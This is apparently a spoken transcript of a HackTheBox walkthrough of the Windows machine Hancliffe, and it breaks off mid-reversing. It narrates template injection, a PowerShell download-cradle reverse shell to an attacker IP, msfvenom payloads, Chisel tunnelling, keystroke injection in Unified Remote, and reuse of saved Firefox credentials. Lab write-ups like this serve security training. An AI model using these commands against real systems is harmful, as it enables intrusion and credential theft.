What's going on YouTube? This is Ipsec. I'm doing Hancliffe from HackTheBox, which has a lot going on in it. It starts out with a server-side template injection in Java, which is a little bit different, but not really. It gets a shell on the box. You have to upload Chisel so you can tunnel to a unified remote app, which if you have installed an application on your phone that acts as a mouse on your computer, this is essentially that. There's no authentication, so if you can connect to the socket, you can send keystrokes and get a shell as the logged in user, which has a Firefox profile that has a saved credential that gets you access to a different user that has the ability to download a custom application on the box that's vulnerable to a buffer overflow. But there's a twist on it. You have to do a socket reuse on this buffer overflow because there's not a lot of stack space to work with. So you create an extra receive call that allocates a larger buffer where you can send your shellcode in. It's something I've read about a few times but never actually done it. So hopefully it makes sense how I do it. Let's just jump in. As always, we're going to start off with an nmap. So -sc for default scripts, sv, enumerate versions, oa, output all formats, put in the nmap directory and call it Hancliffe, and then the IP address of 10.10.11.115. This can take some time to run, so I've already ran it. And looking at the ports, we have 3 ports open, it looks like. The first one being HTTP on port 80. It's running Nginx. We also have a HTTP service on port 8000 running Nginx, the same exact version. However, the difference is the title for both of these is different. The port 80 is just the blank welcome to Nginx banner, while port 8000 is HashPass, an open source stateless password manager. We also have port quad 9s open, and nmap doesn't exactly know what that is. That's why the service has a question mark in it. It's just guessing based upon the Abyss service normally listening on this port. If we look at it though, we have a banner that just says welcome, asking for username and password. So I bet if we nc 10.10.11.115 on port quad 9s, we do get a blank password thing, and it just says username and password incorrect. So we can try creating a custom like brute forcer for this, and I notice I misspelled please, or we can begin enumerating the websites. So the very first thing I'm going to do is run a Gobuster. So I'm going to do Gobuster dir -u for URL HTTP 10.10.11.115, and I want to go over to this Nginx page, so 10.10.11.115, and let's try like index.php to see if it has PHP files. Robots.txt, although nmap would automatically display that, so we don't really know the extension here, so I can't specify an extension in Gobuster. So I'll just leave it at -u, and we'll do opt wordlist or opt seclist, then discovery. After that, we can do web content, wrapped small words, .text. And one thing we can also do with this box, or any box, we can always send a ping message. And the reason why I'm doing that is because I want to look at the TTL. This TTL is 127, which means this is most likely a Windows box. If I pinged a Linux box, the TTL is going to be like 64 or 63. The TTL decrements by 1 every time you hop between a router, and like 127.0.0.1, that's my local host, so it's 64. If it was a HackTheBox machine where there's one hop in between us, it would be a TTL of 63. So Windows is 128. The TTL for that was 127, so I'm guessing this is a Windows box. We can confirm this because the Windows file system is not case sensitive, unlike Linux. So if I do index.html, we get that. If I put some casing like capital N and capital E, we also get this banner. If I did not do that, we get the 404 page. So it having that TTL and also the URL being case insensitive are both clues this is a Windows box, even though we don't have like port 445 open. So I'm going to change my brute force, and we're going to do -lowercase.text because we don't have to do any case sensitive things. So I can just do O for out file, gobuster.out. And while that runs, let's go take a look at port 8000. So taking a look at 8000, this is HashPass, a stateless password manager. If I do like ipsec website of ipsec.rocks, I'll put the master password of please subscribe. We click generate password, and it gives us a password for that website. Oh man, it deleted everything. That's annoying. If I do like hackthebox.com and master password of please subscribe. It's going to give us a different generated password. So it's using the combination of probably name, website, and master password to generate this random thing. It's just a little bit more secure than like doing website password IPsec. And like, so HackTheBox would be, my password would be HackTheBox IPsec, and the password for IPsec Rocks would be IPsec Rocks IPsec. Like, just creating a unique password per website is what this thing is doing. I can just Google it. If I Google HashPass, probably add GitHub, we can see it is an open source product. We could look at the issues, see if there's any recent like security issues while a Gobuster is running. There's literally nothing in here. So no issues. Going back to Gobuster, we do have maintenance being routed to Nuxeo/maintenance. So let's go over to exploit.db. We can type HashPass to see if there's a vulnerability. If something does come up, I'm guessing it would just be like a generator if you know someone's master password, but nothing here. We can look at Nuxeo and see if there's anything here. And we do have a RCE. So let's go take a look at this web page. So if I go to 10.10.11.115, then Nuxeo, we have to do, I think it was /maintenance. Yeah, /maintenance. So let's put this in. I don't want to do /Nuxeo maintenance. It's redirecting me there, I think. Let's intercept this with Burp Suite so we can see exactly what happens. Turn the proxy on, go here. So we get maintenance. I'm going to intercept the response to this request, forward it, and we can see it's responding Nginx and sending us to Nuxeo/maintenance. So if I forward this, we're going to get it. I also want to intercept the response to this one, and we just get the 404 not found. So let's go do a dir bust on this directory. So I'm going to run Gobuster dir-u http 10.10.11.115/maintenance, and let's do -wordlist opt seclist discovery web content raft small words.txt, and I'm going to Google Nuxeo, and I don't know why I Googled Google Nuxeo. Let's just say Nuxeo. Is there a GitHub for it? Is it open source? It looks like it is. If we look at it, it is Java. And let's see. I'm guessing this is going to be the extension JSP because it is Java. So we can just add that extension for raft small words and brute force this as well. And let's take a look at this. So if I go /maintenance /index page not found, if I do something, this is a different 404 error message, right? So if I do something here, we get that 404 not found. This one is different, right? And if I intercept this in Burp Suite, let's go Burp Suite, intercept the response to this request, we can see it's setting a JSessionID token. And this is indicative that it's probably Tomcat on the back end. So we have Nginx in front of Tomcat acting as a reverse proxy. And as you probably know, if you've watched a lot of the videos, if we go to ipsec.rocks, I really need to set a pattern so I don't have to keep disabling my Foxy proxy. But if I do this, Tomcat Nginx, we have this SSRF talk. We can do Tomcat Apache as well. So there's a vulnerability when we have Nginx running with Tomcat. So let's see, orange, psi, SSRF, Tomcat would be a good Google to find this. Breaking parser logic. And if I go down, let's see, where is it? That's agenda. So if I send these, then Tomcat, Jetty, Wirefly, and WebLogic, this is how they act. So Nginx, I'm putting a semicolon, name equals orange, and then /bar, and Tomcat ignores this whole piece and just goes to /foo/bar. And this is important because if we are being blocked via an Nginx config, so if Nginx is just saying, hey, don't allow them to /manager, I think manager is the default Tomcat, manager Tomcat URL. Yeah, /manager/HTML. So if there's some Nginx blacklist that's preventing us access to this file, then we can just bypass it, because if we put /manager, then this name equals orange /HTML, then our Tomcat filter is no longer accessing it. Additionally, we can go do directory traversal with .. semicolon. So that's what I'm going to try doing real quick. So I'm going to do .. semicolon /manager /HTML. See if we get a Tomcat manager page. We do not. I'm also going to try /manager, and then it was, what is it? Colon name equals something. So we can just do semicolon name equals IP /HTML. See if we access the Tomcat manager this way. We do not. So it's not vulnerable to this. However, if we go back to our Gobuster, 10.10.11.115 maintenance. So it looks like a Gobuster timed out there, oddly enough. But if I try like index.jsp, we get this "we'll be back soon." And if I do .. semicolon index.jsp, we go to this /Nuxeo /nx startup faces. So we got some weird path traversal here in order to access Nuxeo. So for pretty much everything, we want to do this inside of Burp Suite. So if I kill this one, we no longer need Gobustering. We're intercepting. Let's go here, Burp Suite, and we can try .. semicolon index.jsp and see exactly what the server sends up. So intercept this response. It's directing us to /Nuxeo, and then we're going to get this. So I wonder if I do /maintenance / ... semicolon like that, if we actually access the file. We have a login.jsp. So again, I'm going to maintenance so I can access this file. So we're bypassing some Nginx filter. And that did not work. Let's try maintenance login.jsp. And we get to the Nuxeo login portal. So we could try like brute forcing with admin or things like that, but I'm just going to go over to Google and see if there's any known vulnerabilities for this that's not on exploit.db. So Nuxeo exploit, search it. We have a unauthenticated RCE analysis, which, I mean, unauthenticated exploits are always great. If I went to exploit.db, it was remote code execution, and this one was authenticated. But over here, we have an unauthenticated one, then pulling Docker to run it. Let's see exactly how this one works. /login, vulnerability analysis. Where is the vulnerability? I'm not sure this is it. Let's see, is there a different one? We have this GitHub repo of CVE 2018. Let's see if we can find a write-up for it. So Googling the CVE. If we can't, we'll just look at the Python code. Vulnerability scanner, pointing to the exact GitHub repo we have. Go over here. So let's see. Is this going to play? We got the Nuxeo web service there. And how is he going to access this? So it looks like there is a server-side template injection in this URL. So let's try this out real quick. And of course, if we just cheated and looked straight at this, we would find it. But I think this came out after the box was released. So if I do /ipsec.xhtml here, we get this facelet error not found. And if I specify like an SSTI, let's do 1+1, it goes like this. However, if we do like payload all the things, SSTI, pull it up. I probably should have clicked that next one, template injections, server side. Come on. It's loading. Click on Java. We can see SSTI is not just the double brackets we need to put a $sign. So let's try a $sign before this 1+1. We have error has occurred. Let's just do with one bracket. And we have ipsec2.html when we request 1+1. So let's go over and send this over to Burp Suite now. And then we can build a weaponized POC for this. So again, we have ipsec2. If I did, instead of 1+1, we can do 7 times 7. And we should get 49. So just the fact that we're coercing it to do math tells us we can probably get it to do other things. So now I would be going back to the payload all the things and find one that gets code execution. So let's see. Retrieve Java Ginger 2. I'm looking for one. I guess maybe we can just try. Let's try this one. See what happens here with this Git environment. So let's just copy and paste it. And let's see. I'm just going to always get in the habit of URL encoding this whole thing, because when you do these type of payloads, there's a lot of bad characters, and I just got a 500 error. I'm not exactly sure what happened there. Let's see, if we do it without encoding, we get 400. So maybe this whole like payload thing just is not good, or this exploit is not good for it. So we just have to do a little bit of trial and error, finding out the right exploit. And I swear there were more of these. We can try this exec and see exactly what happens. So if I just paste it in, instead of execing a cat, I'm just going to exec who am I? And we can copy or URL encode everything, send it, and we still have that generic error message has occurred. So what I'm going to do is search for other SSTI. I'm just going to do $ then bracket, and we can see other things. This is expression language, and it's a mechanism with JSP and Java, so this looks like it could be helpful. I don't know what this like hashtag thing is, the hashtag session get attribute. Let's see. That's like doing a process builder to get a lot more, like I don't want to do 5 lines to do cmd.exe. Let's see. This one is just execing calc. Let's try this. So I'm going to go over. We can paste it. And instead of calc, I'm going to switch it back to who am I and see if we get its username outputted to us. So let's copy this entire selection, or URL encode it, send it, and we have the error message, and something's weird. It's saying IPsec then Java lang process, so it's giving us like the object. It's not reading the actual text, but it looks like it's executing code. We just can't see the output. So I'm going to un-URL encode this, and let's verify it by doing a ping. So I'm going to do ping 10.10.14.8, and we'll do sudo tcp dump -i ton0 icmp. I'm also going to add a -n so we don't do any DNS resolution. And we should URL encode this whole thing. So convert selection, URL encode all characters. We send it, immediately get this message saying this. But if we go here, we see it pinged us 4 times, which is the default for Windows. If you're doing it on Linux, definitely add, I think, the -c flag, or maybe it's -n. Yeah, -c for Linux, it's -n on Windows, because it'll do an indefinite ping, which can hang a web server, just cause issues. So generally when doing pings, you should always specify the count, but on Windows, it's safe to just bypass that and not do it. So at this point, we can try to get a reverse shell. Don't want to pull that up. And since I'm working inside of an exploit, there's probably going to be a lot of bad characters. Like I can't use all these quotes and things like that. So I'm going to use just PowerShell and paste in some base64. So to do that, I'm just going to create the string here. So we'll do IEX, new object, net.webclient, download string, then HTTP 10.10.14.8/shell.ps1. And that should be all we need. I'm going to do iconvert-t, and then it's UTF-16 little endian. And this just puts it in a format Windows base 64 likes. And it just wants everything to be 16 bytes. So if I did not do that -t, you would see it not, everything's just like 1 byte instead of having this null byte. So we can do base64-w0. We get this big base64 object. We can copy and type PowerShell-enc and paste that in. And then what we have to do is make a web directory and put shell.ps1 there. So I'm going to copy user share nashang, then shells, and invoke PowerShell tcp.ps1 to just shell.ps1. And we can just edit it. I'm going to take this one-liner to send a reverse shell, put it at the bottom after it loads it, and then we can change the IP to be myself, so 10.10.14.8, and I always like port 9001. No reason, it's just what I like to do. And then sudo python3-m http server port 80, and we can say nc, actually before nc, or lwrap, netcat lvnp 9001, and rlwrap just gives us the ability to do the up and down arrow, so nothing too special there. I'm going to copy this, so not copy but highlight, convert selection, URL, encode all characters, send it. We go back here and we can see it got our shell and we have the reverse shell. The first thing I always like doing whenever I get a shell is running the whoami/all. You'd also just do like the /priv because really that's what you're after. Just see what privilege you have to see if there's an easy privesc with like SE impersonate. There isn't, and if we scroll up, we can see we are the Hancliffe service account. So we know who we are. There's not a quick privesc there. The other thing I like doing is like running WinPEAS, but before I do that, because there's just so much output, I want to see exactly what is listing on that port 9999. And OXDF had a really good blog post that he found. If you just Google like netstat listening ports PowerShell, I believe. This has a really clever one-liner. to be able to get a lot of good information on one line. And let's see, let's Google it again. Netstat listening ports PowerShell. Go to this Atom the Automator thing, and this whole guide is pretty good. It's just kind of talking about how to do things, but we just want to grab one snippet. So he's using this get net TCP connection with state listen flag, and he's going to select the object and get the process to get like a bunch of information from it. So let's copy this, paste it in, and I don't know if it ran or not. Oh, it did. So it errors at the end. I'm not sure what that's about, but we can see a lot of information. So we have like engine X, and its remote and remote port is quad zeros. Its local address is all zeros, but its local port is 80. So I'm just going to run the same command, and I'm going to do format table. I could probably just do FT for short, and then we can do dash property. And what do we want? We want, let's see, is there, remote port is 0, so we probably want local address and local port, right? So local address, local port, and before that, I probably want the process name. So if I run this command, now we have pretty much what we want of network socket wise. So we can see 9999 is SVC host. We have something here. It's truncated. Let's see. Format table, maybe dash auto wrap. I always forget how to not truncate. Let's try like dash size 100. Oh, come on. What if I put process name at the end if it'll still truncate? Let's see. It still does. So I need to search format table, do not truncate, because I don't know that off the top of my head. How do it without truncating? Come on. Dash width. Wait, what's outstring? Format table, dash auto size. Let's try that. Dash auto size. There we go. Now it's not truncating. So Java's listening on a lot. All this stuff we can't access. Or that may not be listening. So we can also do, oh man, there we go. If I say dash state listen, now it's only going to show me the listening ports, because I'm guessing some of those Java connections up top were us connecting to the box. So here's only listening. We can see what ports. So 445 and 135 are, but the firewall is blocking those because they did not show up on nmap. We have SVC host running on 9999. We have this remote server win. We have Java. We have MyFirstApp. We got PHP, which is probably for that Nginx. Java, which is probably Nuxeo. Nginx, again, two Nginx processes. We have a Postgres database, so we probably want to figure out how to connect to Postgres and dump those credentials. But first, I'm kind of curious what remote server win is. I would Google MyFirstApp, but it's clear that's a custom application. So if we come across that on the server, we should definitely take a look at it. Going here, it says this is part of the unified remote. So if I Google unified remote exploit, we do have something on exploitdb, which looks to be a Python app. So let's go and download it. So if I go over to raw, we can copy it. We want to download it locally. And then the issue we're going to have, maybe ncat didn't, or nmap doesn't scan it by default, but port 9512, where that's listening, is not accessible to us. So this remote server win, these ports are not accessible, so I'm going to have to tunnel to get them. So let's move this to be unified remote.py, and then we'll download a good friend Chisel. So I'm just going to do Chisel GitHub, and we will download a Windows and Linux one. So go to releases, AMD 64. Make sure you don't get the ARM, which I'm famous for. So download this. We can gzip-g, Chisel, move it to just be a better file name, chmod plus x Chisel. And then we want to get the Windows exe, so AMD 64 for Windows, copy link, wget, then gzip-d, Chisel, and then let's move this in www, and we'll call this chisel.exe. And I just want to validate that is a executable based upon file it is. So now we can download this file. So I'm going to go into cd/program data, which is generally where I like dropping files on Windows, and see if PowerShell has curl because it's just so much easier to type. Chisel.exe, 10.10.14.8, chisel.exe. Looks like it does. We are downloading Chisel. And then, let's see, do I have send? Let's see. Yes, I can send this to pane 2. Can't join pane from window. What? That sucks. So it looks like my sending between panes is not working. I was hoping, let's see. Let's just move our www server to pane 2. Sudo python 3-m http server 80, because I wanted to have 2 full console lines here. So on our server, we're going to do /chisel, specify server, the port. I like using 8001 for Chisel because it defaults to 8080, which Burp uses. So I like using 8000 for Python's web server, and 8001 is generally what I use for Chisel. And we enable the reverse. And then over here, do a dir. We have chisel.exe. So execute that. We specify client 10.10.14.8, port 8001. We're going to do R for reverse, 9512. And then it's very, very important to use 127.0.0.1, not localhost, because if you do localhost, then it may pick an IPv6 address and just weirdness happens where it may not work. So 127.0.0.1 is a lot more reliable than localhost. So run this. If we did it correct, we see session 1 has opened. So we should have port 9512 listing on ourselves. So if I do nc or sslntp, grep 9512, that is now listening. It's through Chisel. So let's go and take a look at this exploit. So it's a Python exploit, and all this is doing is jamming packets on the wire. And we see this .decode hex. This is a Python 2 thing. So this is a Python 2 script. And we got rhost, lhost, and payload. So our rhost is actually going to be 127.0.0.1. Our lhost is going to be ourselves, so 10.10.14.8. And then the payload, we don't know what that is. So let's try taking a look at how this works. So it's sending keys, send return. So what the unified remote is just a application that enables you, I think, to control your computer via your phone. It's like VNC. And what this is doing is just pretty much executing a bunch of keystrokes to open a command prompt by sending string cmd.exe, then using certutil to download something, and then saving it to C:\Windows temp to execute. So let us build a payload. And to do that, I'm going to use MSFVenom -l payloads, and we want to do the reverse shell. So once this happens, we should be able to search for what we want. Let's see, reverse underscore shell. CMD mainframe. That's not what I want. Let's see. Probably reverse TCP. That's VNC inject. Here we go. Now there's two of these. We have this shell slash reverse TCP and shell underscore reverse TCP. When you see it slashed like this, this is a staged payload. So we'll need MSF multi-handler to execute this because it's not sending the whole payload. It's sending a stub to tell the server to go to a web server, which then sends the reverse shell. If you see it with the underscore, this is stage lists, and it puts it all in one big file. And that's what we want because we just want to listen on one port. So MSFVenom -p, put this, lhost is equal to 10.10.14.8, lport is equal to 9001, format exe-o, we'll call this rev.exe for reverse, but I don't want to type reverse every time, so I just called it rev. And now it takes a little bit to run because it is Ruby, but there we go, it is saved. And I'm just going to copy this into my www directory because I don't know where this Python application is going to write it to. So it wanted our host, which because we're bending the port back to ourselves, it's 127.0.0.1, and then we can just execute it this way, and we see, oh, we didn't say unified remote. So again, it's a Python 2 application, so let's specify Python 2. And it says it's opening command prompt, doing the super fast hacker typing, which is just doing cert util, downloading, and then going to try to execute. And we did not listen on port 9001. But this exploit is actually going to have an issue because we don't have permission to write to C:\Windows temp. We could test that out by doing like, we lost our shell here, but we could just try writing there and we don't have access. So let's try editing this exploit. So unified remote, and let's change this to be program data. And then we also want to change where cert util is writing. So change this to program data. Alternatively, we could just drop the file ourselves and not deal with this cert util download thing. So let's try this and see what happens. So it's starting. Oh, wait, what? We got a thing. Was that this? I did not see when we got that shell. That was weird. Let's see. Downloading payload. Yep. So I don't know exactly when we got the shell, but we do have it. If we go to cd program data, do a dir, we can see rev.exe did download there. And if we look at a web server, it is downloading several times. So that's weird. Hold on. How many times does it download for one run? I know cert util is a weird program when you use it to download. So if I just execute this and we wait here, it may do like 4 requests to actually download it. Is that right? So we got 2. Is it going to do any more? Doesn't look like it, but yeah. It may have been like 2 for trying to download a C:\Windows temp, and maybe that worked. But yeah, let's just continue on with the lives because we have a reverse shell. But you can see I can't control L. I can't do up and down because I forgot our L wrap. So let's redo that. And then we will have a good or semi-good Windows shell and continue on through this box. Actually, I decided I did not want to continue just yet. Let's convert this script to be Python 3 because a lot of people doing this box may not have Python 2 installed anymore. So the issue is all these .decode hexes. We can replace that with from bin ASCII import unhexlify. And then all we have to do is put unhexify and remove decode hex. So what I'm going to do, put my cursor over here. I'm going to hit QA and Vim, and you can see it's now recording a macro. So I'm going to type unhexlify, then escape, and I'm going to search for decode. Then we'll delete the rest of that. I will hit Q to end my macro. And now if I just go to the open parenthesis, and I can say at A, and it redoes that macro, which I think was fine. Let's see, at A. I can't tell if it's doing something bad or not. The dangers of a Vim macro, I guess. So do this. I'm going to search for open parenthesis like that. At A. Go next. Let's see. Maybe I need to do equals open like that. At A. Next. Oh. Because my macro is overwriting my next search, when I hit N, it just goes to the next decode because my macro searches for decode. Let's see, this one, we just want unhexlify here. And then we pray I just typed that right. There's no more decodes. So if I do netcat here, we can do Python 3, unified remote. Our host is not defined. Yeah, of course, because we have to specify all the variables. There we go. And now the application is running, and hopefully we still get our shell with Python 3. And when we do, we can all cheer that now the script has been ported over successfully. So as always, I'm just going to run a whoami/all, and we can see our privileges because we did exploit our service, and it didn't really give us any extra privileges. We're just this Clara user. We could run that whole netstat thing again and find open ports, but we already looked at that. So now it's like hunting for the like MyFirstApp exe. And going into C:\\, I'm guessing it's going to be in dev app. So I go in there and can't. Access denied. So at this point, I decide, you know what? Let's run some WinPEAS. So I'm going to Google peas-ng and go to the GitHub page to download it. If you didn't know, I know I said in the last few videos, but WinPEAS had switched to just executables that you download, and the actual like source code generates these executables. So if you ever want it, go to the releases and download it. Gonna go in wget. We have winpeas ne.exe, so you can guess I'm gonna go to program data so I can write it. So curl-o for out file, winpeas.exe, then http 10.10.14.8, winpeas.ne.exe. So this will download it, we can execute it, and then hopefully it gives us a tip on where to go next. I probably typed it. Oh, I just called it winpeas.exe. There we go. So I'm going to pause the video, let this run, because it'll probably take around 2 to 3 minutes to go through everything and generate 6,000 to 7,000 lines. So WinPEAS is now done, so let's go up to the top, and I don't even see 6,000 lines at all, so this one's much shorter than the last time I ran it. So I'm just going to search for winpeas.exe to quickly go up to where we ran it and just look through everything. So it does detect it is a virtual machine. It was trying to use Watson to look for unpatched Windows vulnerabilities, which I don't know if it's updated anymore. Looking at this, last update was 2020. Is there a dev branch? We can check that. Still 2020. So Watson, not really updated anymore to look for Windows vulnerabilities. Has some hotfix information, so we could see like the time Windows was updated. I don't see any like 2022 patches, so maybe kernel privs could be there because it's around 6 months old, maybe. I don't know at this point. But I don't know of any O-Day Windows privs in the kernel lately, so let's skip also past all those hot patches. We have last shutdown time. This is probably when the machine was tested. We have user environment variables. We do have Java in the class path. And one thing I've noticed a lot with this, a lot of times users can write to these directories in Java, And when you do, you may have some type of DLL injection for other things. So I don't think it's vulnerable on this box, but just something to keep in mind when you're doing other vulnerabilities or persistence techniques, to always look at like the Java class path to see if low privilege users can write there. We do have environment variables, audit settings, laps, wdigest, LSA, credguard, cache creds, UAC, PowerShell settings. We do have a history file with some data. So maybe this time I'll remember to look at it. Let's do v notes, paste that in, put that on one line. Then let's keep on going. PowerShell session. I'm going to laugh. That's also like one of my PowerShell things, except I didn't do PowerShell with Clara because this is just reverse shell with Meterpreter. Or not Meterpreter, just reverse shell with MSFVenom, not executing PowerShell. Sysmon, I must be an administrator to check. I don't know if that's actually true. We could certainly check like a Windows directory for sysmon config. That's often left behind. So there's probably ways we could check for, enumerating sysmon configuration, not if sysmon's installed. My bad. Yeah, you do need administrator normally to read the configuration, but you may be able to find the config file that's used to load it and have read access to that. So this check may be better worded, or maybe could use more refinement. Administrator to run those. Idle time, we can see how long the box has probably been powered on. Oh, that was weird. I don't know why it stopped, but there was an Azure thing I liked. Azure joined, was it? Crap. Search for Azure. So this is not a Azure machine. That's pretty cool to be able to show that. We have it looking at tokens, nothing interesting there. Clipboard text, we don't have anything. Logged in users, so we can see this is me on the reverse shell. This is me on this shell. And I guess administrator has a local thing logged in. What is this at? Information about users. RDP session. That's weird. Interactive. Password policy. Logon services. Process information. OneDrive, we can't do hijacking there. I just stopped because it was red. We may be able to modify some services. So we can start and stop them, but we can't edit them. So I don't think there's anything to do there. Installed applications, auto runs. This auto run piece is pretty noisy. I don't know if it's highly vulnerable. I don't think we can exploit these known DLL things. And I see that quite often. Let's see. Authenticated users can create files in the task directory. This is being pointed out most likely as a potential app locker bypass because a lot of people like whitelisting SQL in Windows. List of all the processes. So this is also doing the same thing we did manually of showing us running processes and their port. We just did it through PowerShell without running WinPEAS. IPv6 connections. Windows Vault, Cred Manager. DPAPI keys. NetMTLM. I wonder if we could get Clara's password. I don't think we have that yet. So maybe we could try cracking that. We do have saved credentials for Firefox, localhost 8000, Hancliffe.htb, and this Hancliffe development master key. And it pulled that from this Firefox database file at SQL and users Clara app data Firefox profile. So this is the password manager. So let's try logging into this. So if I go to 10.10.11.115, port 8000, then let's see, the full name, we don't know that. We have the username. So maybe the username, let's see. I'm going to put Hancliffe.hcb for both. And then I'm going to use this development master key. and then generate password. So we have this password. So I'm going to put that in notes. Was that it? There we go. Oh no, I didn't paste the whole thing the first time. Then I'm going to do it with just the site. The user can be something different. I'm just making sure, see if this gives us anything different based upon a username. So the username does play a role in this. So we need to figure out either username or website this goes to. Let's see. I'm going to just put these in. Hancliffe HTTP. Put this in. And I want to check the users on the box to see if there's any we don't have. If I do net user, we have development and administrator. We could try both of these. We already know service account and Clara. But I'm going to start off with development because there's still that myapp.exe that we don't know. So I'm guessing there's a step before we get to administrative access. So let's try development hancliffe.htb in this password. We have this weird thing. Let's put this here. And then we have to figure out a way to use this password. And I'm going to just use Chisel again. We have it in a directory, so I can just do chisel.exe, client 10.10.14.8, 8001. I'm going to do reverse 5985, 127.0.0.1, 5985, and then we're going to do 5986 again, or 5986 and localhost again. And these are the two WinRM ports, so we're just forwarding them both back to our box. Looks like it is connected. So if I try evil-winrm, then we can do -i, localhost, and then -u, development, -p. And we're going to get these notes. So I can grab this. And we can see if we can log in. And we do. So we are now the development user. I'm going to go cd / see if I can get into that dev app directory again. And we can. So I'm going to download MyFirstApp.exe. And then I'm also going to download restart.ps1. And we're going to reverse these. So download restart.ps1. And before we do this, I want to get back to Clara. So let's do that. Let's see. I think we did it here. Python 3 Unified Remote Exploit. Oh, my one shell has died. That's still running. Weird. SSLNTP grep for 9.5. It was 9.5.1.2, right? Let's see, RLWrap 9.5.1.2. So that session died. Let's start this up again. We have a socket listening here. We can execute this. We get this. And then we want to do program data. And run this Chisel command again, because I want to get to the Clara user. And all I want to do is look at that stupid PowerShell history file. I don't know why it's being such a pain. So let's do nclvnp 9001. Maybe we should have just got her password with that net NTLM thing. But we can do it this way too. Okay, now we're Clara. So we can grab this file and see what it says. And then start that binary exploitation piece. So type. It's just doing IP. Oh, this is the Windows remote thing. The cert util. I'm guessing it's 14.11. Maybe this is from testing, because it's going in temp. but I was 14.8, so I don't know exactly how old this is, but this is definitely from testing or someone else because it's .11, not .8. So let's go back and make sure we have MyFirstApp.exe. And I'm looking at file. It is not a .NET thing, so we have to reverse this the hard way. So let's open up Ghidra with opt Ghidra run, and we can see my version is a little bit outdated. It's a few months old, but I don't think that will matter all that much. Do new project, and we'll just call it Hancliffe. And then it doesn't really matter because all we want to do is be able to click that little dragon icon and then hit I to import a binary, select MyFirstApp.exe, and it'll tell us it's importing as a 32-bit Windows executable, which is fine. And now we're just going to choose all the default options and wait for this little thing to stop moving, indicating that Ghidra is done processing the binary. So I'm going to go over to exports, click on main, and then I want to see exactly where I begin in this program. If you remember from the very start of the video, this listed on port quad 9s, and it just asks for a username. So I'm just going to glance over the output to see if I see anything that says username, and I'm not exactly seeing it. So I'm going to go to search strings, and then we're going to search for it here. So I'm going to do username, click it, and we can see the disassembly view changed. I'm going to right click references, show references to this address, and we're going to look at it and now move this pane back over. So in the decompiled output, if I highlight this, I thought it would highlight over here exactly what it does, but I don't see it highlighting in the code where we're at. Maybe I should do a few lines. There we go. So we can see clearly it's sending username, then receiving, putting it on a variable. If we go down a little bit, it's calling this login function. So I'm guessing this is going to be username and password. We can see AC stack 50. It's right around this username. So chances are that is what we want. So I'm going to go into username. And then it doesn't know exactly what type this is. I'm going to guess Boolean because we're returning 0 or 1. But we don't have to define this. We can leave it as undefined. The key thing is looking at these variables. I don't know exactly what local 10 is, but we assumed we were passing username and password to it. And if I look where param1 is used, it's used down here on line 25, and it's comparing against local 10, which is this. So I'm going to guess this is some hard-coded username. And param1 will be user input, so I'm going to call it input username. And then over here, ivar2, this is the result. I like just calling this variable r, and whenever I see r in my head, I think of result. So if the compare matches and this next compare, local 14 and local 28 match, then return 1. So we pass the login. We don't know what local 14 and 28 is. 14 looks like it's a hard-coded password. And then the next thing, local 28, I'm trying to find that right here. Maybe this is going to be the username. Let's kind of trace param2. So param2 moves over to local 39. So I'm just going to call this PW. And then we do local 18. We're doing encrypt 1, 0 PW. And this is going to be PW ENC1. And then we're going to grab the length. So this is len PW ENC1. And then local 24 looks like this is going to be a second encrypt function result. So I'm going to call this PW ENC2. And then PW ENC2. I probably should have done it like that. I think that would be a normal convention. This is going to be length of this. So len ENC PW2. And here all we're doing is a compare. So this is going to be another result, but result of password, and I'm going to call this result of user. Maybe this isn't result of password. This is just base64 password. My bad. So PW B64 encoded. There we go. So now this starts making sense. So if our username is Alfinsinya, or I don't know how to pronounce that, sorry for butchering it, and the hard-coded password is equal to our user inputted password after doing all these encryption routines, then we pass login. So we have to reverse this. So let's take a look at exactly what encrypt1 is. And keep in mind, the very first thing that we passed, let's go back real quick. Back. Encrypt1, we pass 0. I don't know exactly what that is for, but the second time we encrypt, we do pass a length. So let's go back to encrypt. Well, param1 isn't even used. So this is 0 is what we passed, and then param2 is going to be the password. So here we are looping through, and this is going to loop through the length of param2. So this can be len pw, like that. And this is going to be a single character in the password, or this, I guess we can call it I, right? That's probably how you're used to seeing it. So for I in the length of password, keep going. So we have this if then. So if the character is greater than space and the character is not equal to 7F. So over here, we probably just want to man ASCII, and we can see what space is. So I think this one is hex, right? 32? Let's see. Nope, 20. So hex 20 is space. So if the character is greater than hex 20 and it is not 7F, let's look at what 7F is. 7F is delete. Then we're going to go here. And we're going to add 2F. And I don't know exactly what 2F is. Let's see. If I do Python 3, 0x2F, 47. So we're going to add 47 to the character. So char plus 47. And then we'll say if the character plus 47 is less than 7F, which is the delete character, then we're just going to set it to that value of character plus 47. Else, if that character is equal to 40, if it's probably greater than 7F, then we're going to subtract 5E from it. And one thing about 7F that is rot47, you're probably familiar with, I think rot32 is it, for like ASCII characters, but rot47 includes symbols. So I'm going to go to cyberchef, GCHQ, and we're going to start this out. So we'll say from base64 and then rot47. Oh, rot13 is that. I don't know why I said 32, but yeah, rot13 would be the characters. So this is upper, lower, and symbols, I believe, in rot47. Really don't know why I said rot32. 32 was just on my mind. But encrypt1, we now know is rot47. Awesome. So we want to go all the way back to login. It's going to return that string, so I'm just going to do search strings and we'll get back to user. I can probably go to like functions and login, and we can get there that way, but maybe this way's faster, maybe it's not, who knows. Show references to this. Welcome to Brinks. Login successful, so we go in here, and we can see we already got the rot47 documented. So now we got to go into this encrypt2 function. And this one is a bit more different or difficult. So param2, remember this was password length, and param1, this is going to be PW. And this we can say is I. So again, we're just looping through the whole character. And now we're going to say, let's see, local 11 PWI. So this will be character. So if the character is less than 41, or the character is greater than 5A and less than 61, or 7A. So let's take a look at exactly what all these values are. So let's go look at 41. Let's do man ASCII 41. That's A. So if the character is less than A, so this is going to be like symbols, I guess, or character is greater than 5A, so Z. So again, it's hitting some symbols, and less than 61. I'm going to guess before 61 is symbols again, and 7A. See, is these symbols after lowercase? It is. So we can say comments, pre-comment, and I'm just going to say if char is a symbol, because that's essentially what the if statement does. And if it is, then we just, this will be output. So if it's a symbol, we do nothing. We just set it to be the output. Else, beaver is equal to char less than 5b. We're adding 20 here. So let's see. I'm guessing this is a different way to do if-thens. So if character is less than 5b, so what is 5b? So maybe this is uppercase, because 5b is here, 5a is z. So maybe this is going to be uppercase. So I'm going to set a pre-comment real quick. And then let's see. Do we have another one? Output Z. So it doesn't look like we really have, what's bvar1? So if bvar1, and we have another if bvar1, which is, I guess, a little bit weird. Actually, never mind. I just realized. So this is going to convert to lowercase. So 20 would be 32, I believe, which would be the distance between an uppercase character and a lowercase character. And we can demonstrate that. Hold on. Let's just set this. Convert to 